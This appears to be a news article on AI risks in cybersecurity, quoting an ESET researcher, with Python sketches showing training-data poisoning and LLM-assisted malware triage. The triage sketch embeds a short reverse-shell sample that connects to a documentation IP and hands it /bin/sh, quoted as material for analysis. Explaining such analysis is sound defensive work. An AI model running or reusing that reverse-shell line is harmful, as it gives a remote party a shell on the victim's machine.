It’s hard these days to have a discussion about technology without bringing up artificial intelligence: that it is dangerous, that it represents the end of humanity as we know it, that it marks an important leap in the evolution of society, and so on.

And the truth is that when OpenAI’s ChatGPT was released to the general public at the end of November last year, it sent a shock through society worldwide: no application in history had gained one million registered users within five days of its launch, and within two months the chatbot had broken the 100 million mark.

For representatives of the technology company Tanium, the unbridled enthusiasm for AI applications was soon clouded by concerns about their impact on society: taking the results at face value, some of which are hallucinations, is as worrisome as questions about the technology’s disruptive effect on the education system, the danger of scalable and free disinformation campaigns, low-threshold access to malicious code, and compliance and copyright issues that remain unresolved.

Mario Micucci, ESET security researcher for Latin America, says the first thing is to distinguish between artificial intelligence and machine learning. “In the media and in marketing, they talk about artificial intelligence as a whole. And the truth is that artificial intelligence is still science fiction, because artificial intelligence is the imitation of human behavior,” the expert adds.

So, what are the main risks of artificial intelligence in cybersecurity?

The risks are diverse and point in different directions. For the expert, it is important to establish that what we are actually experiencing today is machine learning, which is just one branch of artificial intelligence.

One set of risks lies in the possibility of subverting the algorithms themselves: abusing machine learning to manipulate the results of a system. “We must not forget that every time a system based on machine learning is developed, you have to teach it to make decisions, decisions based on large amounts of data,” explains Micucci.

In this sense, it becomes a problem if someone tampers with the training data, compromising the quality and integrity of the data the system learns from and, as a result, producing flawed outputs that can pose real risks.
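To make the kind of tampering Micucci describes concrete, here is a minimal data-poisoning sketch using scikit-learn. The synthetic dataset, the logistic regression model, and the 30% label-flipping rate are illustrative assumptions, not anything from ESET; the point is simply that corrupting training labels degrades the resulting model.

```python
# Minimal data-poisoning sketch (illustrative assumptions throughout).
# Flipping a fraction of training labels shows how tampering with
# training data degrades the quality of a learned model.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

# Synthetic binary classification task (stand-in for real training data).
X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# Clean baseline.
clean_model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
print("clean accuracy:", accuracy_score(y_test, clean_model.predict(X_test)))

# An attacker flips the labels of 30% of the training set.
rng = np.random.default_rng(0)
poisoned = y_train.copy()
idx = rng.choice(len(poisoned), size=int(0.3 * len(poisoned)), replace=False)
poisoned[idx] = 1 - poisoned[idx]

poisoned_model = LogisticRegression(max_iter=1000).fit(X_train, poisoned)
print("poisoned accuracy:", accuracy_score(y_test, poisoned_model.predict(X_test)))
```

Running the sketch shows the poisoned model scoring noticeably worse than the clean baseline, which is exactly the quality-and-integrity problem described above.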

On the other hand, at a more general level, there are risks focused on the end user: adversaries abusing AI systems built on machine learning. “For example, someone can grab ChatGPT and tell it, ‘Okay, I want malware with such-and-such characteristics,’ and then simply follow the instructions it produces. This represents an ease of creating malware and malicious code that did not exist before,” concludes the ESET expert.

Regulate and involve experts

Countries like Italy and China have tried to restrict the use of ChatGPT; these are early examples of regulatory approaches that remain complicated, because even the best AI developers at OpenAI and Google cannot fully explain (or do not want to disclose) the details of how the results of their generative AI models are produced, a situation that should be taken as a warning sign.

For Tanium, in the eyes of investors and developers nothing less than the greatest development opportunity in human history is at stake, with the promise of nearly limitless automated value creation, quantum leaps in science, and the resulting increased prosperity for all of humanity.

But at the same time, only a handful of researchers worldwide work in the disciplines of AI safety. The first of these is interpretability, which is concerned with developing a deep understanding of how the various AI models produce their results. Only with this insight can future AI behavior be predicted and harmful consequences avoided.

But it’s not all negative. The second discipline of AI safety is alignment research, which aims to equip current (weak) and future (strong) AI models and agents with the core and fundamental values of humanity and to integrate those values into their very design.

Just as a cyber attacker can use AI to create malware, as mentioned above, an analyst can also use the same tool to analyze malicious software. That is, an analyst can submit a sample of malicious code, have it analyzed, and find indicators of compromise. A job that would demand many hours of reverse engineering and intellectual work from the analyst is done by a machine in far less time.
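As a rough illustration of this workflow, the sketch below sends a suspicious code snippet to a large language model and asks for possible indicators of compromise. It assumes the official openai Python client (v1 interface) and an OPENAI_API_KEY in the environment; the model name, the prompt, and the code sample are placeholders, not an ESET tool or method.

```python
# Hedged sketch: LLM-assisted triage of a suspicious code sample.
# Assumes the openai Python package (v1 API) with OPENAI_API_KEY set
# in the environment; model name and prompt are illustrative only.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Placeholder sample (never executed here); in practice this would
# come from a quarantined file. The IP uses the reserved TEST-NET-3 range.
suspicious_code = """
import socket, subprocess
s = socket.socket(); s.connect(("203.0.113.7", 4444))
subprocess.call(["/bin/sh"], stdin=s.fileno(), stdout=s.fileno())
"""

response = client.chat.completions.create(
    model="gpt-4o-mini",  # assumed model name; substitute as needed
    messages=[
        {"role": "system",
         "content": "You are a malware analyst. List likely indicators "
                    "of compromise (IPs, ports, behaviors) in the sample."},
        {"role": "user", "content": suspicious_code},
    ],
)
print(response.choices[0].message.content)
```

The model’s answer is a starting point for triage, not a verdict: the indicators it flags still need to be verified by the analyst, but it can shave hours off the initial reverse-engineering pass.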

“In fact, we are talking about another technological revolution,” says Mario Micucci, adding: “We have already experienced similar technological revolutions in history. At one point, the job now done by the ATM we use to withdraw money with our card was done by a person. However, the people who filled that role migrated to other types of positions that involve knowing how to operate systems.”